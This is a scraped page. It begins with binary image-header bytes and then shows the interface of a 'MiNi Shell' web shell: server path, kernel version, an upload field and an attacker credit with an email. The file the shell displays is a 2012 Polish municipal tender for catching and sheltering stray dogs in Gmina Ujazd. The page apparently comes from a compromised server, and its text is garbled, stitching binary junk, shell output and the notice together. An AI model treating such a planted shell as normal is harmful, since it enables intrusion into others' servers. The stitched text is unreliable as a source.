JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120706/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120706/239534-N-2012.html

<p class="kh_header"><b>Ujazd: Wyłapywanie  bezpańskich zwierząt z terenu administracyjnego Gminy Ujazd oraz ich hotelowanie.</b><br>
<b>Numer ogłoszenia: 239534 - 2012; data zamieszczenia: 06.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Ujazd , Plac Kościuszki 6, 97-225 Ujazd, woj. łódzkie, tel. 044 7192123, faks 044 7192129.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ujazd.bip.cc</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wyłapywanie  bezpańskich zwierząt z terenu administracyjnego Gminy Ujazd oraz ich hotelowanie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres usługi   obejmuje :
Odłowienie, transport, oraz miesięczne utrzymanie łącznie z obsługą weterynaryjną.
O potrzebie odłowienia psa bezpańskiego Wykonawca każdorazowo będzie informowany telefonicznie przez pracownika Urzędu. Próbę odłowienia zwierzęcia należy podjąć najpóźniej w okresie 3 dni od dnia zgłoszenia, a w przypadku psów agresywnych w tym samym dniu. 
Wykonawca odłowi zgłoszonego przez Zamawiającego  bezdomnego psa i zapewni mu miejsce w schronisku lub hotelu dla zwierząt oraz opiekę weterynaryjna
Wyłapywanie zwierząt, a następnie ich przetrzymywanie w schronisku odbywać się ma zgodnie z obowiązującym prawem - ustawa z dnia 21 sierpnia 1997roku o ochronie zwierząt (Dz.U. z 2003r. Nr 1060, poz. 1002 z póżn. zm.), Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 26 sierpnia 1998r.  w sprawie zasad i warunków wyłapywania bezdomnych zwierząt (Dz.U. z 1998r., Nr 116
Zapewnienia w schronisku opieki bezdomnym zwierzętom  w szczególności :
a)pożywienia w odpowiedniej ilości i jakości i ciągłego dostępu do świeżej wody
b)ochrony przed warunkami atmosferycznymi
Zapewnienie opieki lekarsko weterynaryjnej w zakresie kontroli stanu zdrowia, profilaktyki, szczepień co najmniej przeciw wściekliźnie, leczenia  oraz zwalczania pasożytów obligatoryjnej sterylizacji albo kastracji zwierząt przebywających w Schronisku;
Wykonawca każdemu zwierzęciu  złapanemu na terenie Gminy Ujazd założy kartę informacyjną zawierającą miedzy innymi opis zwierzęcia (gatunek, płeć, maść), datę przyjęcia do hotelu/schroniska, dane dotyczące kwarantanny, prowadzonych szczepień i zabiegów weterynaryjnych, datę opuszczenia hotelu/schroniska oraz imię i nazwisko, adres osoby, której przekazano zwierzę lub datę śmierci zwierzęcia z podaniem przyczyny.  
Po wyłapaniu zwierzęcia Wykonawca zobowiązany jest dokonać identyfikacji każdego odłowionego zwierzęcia polegającej na wszczepieniu mikrochipa;
Wykonawca jest obowiązany nieodpłatnie poddać każdego odłowionego psa zabiegowi kastracji bądź sterylizacji. Zabieg ten należy wykonać w okresie przebywania psa w schronisku w terminie możliwie jak najkrótszym od czasu umieszczenia psa w schronisku/hotelu;
W przypadku, gdy zwierze zostanie adoptowane, a nie zostało poddane zabiegowi kastracji bądź sterylizacji (dotyczy to młodych , które nie osiągnęły dojrzałości płciowej) Wykonawca zobowiązany jest do zamieszczenia w umowie adopcyjnej z właścicielem psa zapisu o konieczności sterylizacji  sterylizacji/kastracji w ściśle określonym terminie. Zabieg może być wykonywany tylko przez lekarza weterynarii bądź lecznicę wykonującą zabiegi dla Wykonawcy. Wykonawca może odstąpić od zabiegu sterylizacji/kastracji na życzenie nowego właściciela.
Zamawiający dopuszcza możliwość usypiania ślepych miotów zwierząt z terenu Gminy Ujazd (zgodnie z art. 6 ustawy z dnia 21 sierpnia 1997roku  o ochronie zwierząt);
Psy pochodzące z Gminy Ujazd umieszczone w schronisku/hotelu Wykonawca będzie przekazywał nowym właścicielom. Wykonawca zapewni rotację przyjętych zwierząt poprzez oddawanie odłowionych zwierząt do adopcji. Poszukiwanie właścicieli bezdomnych zwierząt leży w gestii Wykonawcy,
Wykonawca zapewni w  ciągu roku do 60 miejsc w schronisku dla zwierząt  z terenu Gminy Ujazd.
Wykonawca odbierze nieodpłatnie w terminie jednego miesiąca od podpisania umowy psy z kartami ewidencyjnymi, pochodzące z terenu Gminy Ujazd w ilości 46 szt przebywające w Hotelu dla Zwierząt i Ptactwa Domowego w miejscowości Łódź ul. Kosodrzewiny nr 56/2 oraz w Schronisku dla zwierząt w miejscowości Wojtyszki, Gmina Brąszewice.
Ustalenia i decyzje dotyczące wykonywania zamówienia będą uzgadniane przez Zamawiającego z ustanowionym przedstawicielem  Wykonawcy.
Wykonawca określi telefony kontaktowe i nr faksów oraz dokona innych ustaleń niezbędnych do sprawnego i terminowego  wykonania zamówienia.
Wykonawca realizując usługę będzie informował Zamawiającego o przyjęciu zwierzęcia do schroniska, terminach wykonania zabiegu sterylizacji bądź kastracji, terminie zachipowania oraz przyczynach zdjęcia z ewidencji zwierzęcia  w comiesięcznych sprawozdaniach dołączonych do faktur.
Zamawiający zastrzega sobie prawo do dokonywania zmian w zakresie realizowanej umowy w przypadku, gdy konieczność ich wprowadzenia wyniknie z okoliczności, których nie można było przewidzieć. Zmiany mogą dotyczyć okoliczności wynikających z przyczyn: technicznych, gospodarczych, finansowych, zmian w Programie opieki nad zwierzętami  bezdomnymi Gminy Ujazd przepisów prawa,  jeżeli będzie to konieczne do uzyskania celu określonego w postanowieniach umowy zawartej z Wykonawcą..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień  uzupełniających stanowiących nie więcej niż do 10 % wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 98.38.00.00-0, 85.21.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w niniejszym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest aby Wykonawcy wykazali, że należycie wykonali lub wykonują w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli  okres prowadzenia działalności jest krótszy  - w tym okresie: 
Co najmniej 1 usługę polegającą odławianiu i hotelowaniu bezpańskich zwierząt ;
Wykonawca może polegać na wiedzy i doświadczeniu innego podmiotu niezależnie od charakteru prawnego łączących go z nim stosunków na zasadzie opisanej w art. 26 ust. 2b ustawy.
Ocena spełnienia warunku udziału w postępowaniu przez Wykonawców dokonana zostanie dokonana wg formuły: spełnia - nie spełnia na podstawie złożonych oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest aby Wykonawcy wykazali, że dysponują jednym środkiem transportu do przewozu zwierząt spełniającym warunki określone w ustawie o ochronie zwierząt. 
Wykonawca może polegać na potencjale technicznym innego podmiotu niezależnie od charakteru prawnego łączących go z nim stosunków na zasadzie opisanej w art. 26 ust. 2b ustawy Pzp. 
Ocena spełnienia warunku udziału w postępowaniu przez Wykonawców dokonana zostanie dokonana wg formuły: spełnia - nie spełnia na podstawie złożonych oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może polegać na potencjale innych podmiotów do  wykonania zamówienia niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty określone w pkt III.4, Wykonawcy mogą złożyć wspólnie.
Dokumenty są składane w oryginale lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Zamawiający ma prawo żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wówczas, gdy złożona kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości. Dokumenty sporządzone w języku obcym są składane wraz tłumaczeniem na język polski. 
Oferta powinna zawierać .
a)	Formularz ofertowy - sporządzony zgodnie z załącznikiem nr 1 do siwz;
b)	Pełnomocnictwo do podpisania oferty lub inny dokument, z którego wynika umocowanie do podpisania oferty. Pełnomocnictwa należy przedłożyć w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza.
c)	W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, do oferty musi być załączony dokument ustanawiający pełnomocnika Wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i przy zawarciu umowy w sprawie zamówienia publicznego. Pełnomocnictwa należy przedłożyć w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza.
d)	Zestaw oświadczeń i dokumentów, o których mowa w pkt III.4.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający dopuszcza możliwość dokonania zmian w umowie, pod warunkiem spełnienia przesłanek ustawowych określonych w art. 144 Prawa zamówień publicznych, w szczególności : 
a)	dotyczące zmiany wyznaczonych do realizacji postanowień niniejszej umowy przez wykonawcę,
b)	wystąpienia opóźnień w realizacji umowy powstałych w wyniku okoliczności będących po stronie Zamawiającego, ,
c)	wynikających z opóźnień w realizacji usługi z przyczyn leżących po stronie Wykonawcy tej usługi, ,
d)	w przypadku zwiększenia lub zmiany zakresu umowy o usługi wynikające w szczególności z udzielenia zamówień dodatkowych,
2.	W  przypadku zmiany wysokości obowiązującej stawki podatku od towarów i usług, strony umowy postanawiają, że wynagrodzenie netto określone w § 5 pkt 1 pozostanie bez zmian. Kwota brutto poszczególnych cen jednostkowych zostanie obliczona na podstawie stawki tego podatku obowiązującej w chwili powstania obowiązku podatkowego.
3.	Zamawiający z uwagi na inflację dopuszcza  waloryzację  poszczególnych cen jednostkowych raz na rok przy czym pierwsza waloryzacja nastąpi dopiero po roku, jeżeli wzrost cen w tym okresie według danych GUS przekroczy o 3%  .
4.	Przewidziane w pkt 1 powyżej okoliczności, stanowiące podstawę do wprowadzenia aneksu do umowy, stanową uprawnienie Zamawiającego, nie zaś jego obowiązek. Okoliczności te nie mogą również stanowić podstawy roszczeń Wykonawcy o dodatkowe wynagrodzenie.
5.	Formy aneksu nie wymagają :
a)	aktualizacja danych zamawiającego i Wykonawcy,
b)	zmiana, o której mowa w pkt 2 
6.	W razie wystąpienia istotnej zmiany okoliczności powodującej, ze wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o powyższych okolicznościach. W takim wypadku Wykonawca może żądać wynagrodzenia należnego mu z tytułu wykonania części umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ujazd.bip.cc<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba Zamawiającego Urząd Gminy Ujazd, Plac Kościuszki 6, 97-225 Ujazd pokój nr 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.07.2012 godzina 10:00, miejsce: : siedziba Zamawiającego, Urząd Gminy Ujazd, Plac Kościuszki 6, 97-225 Ujazd pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com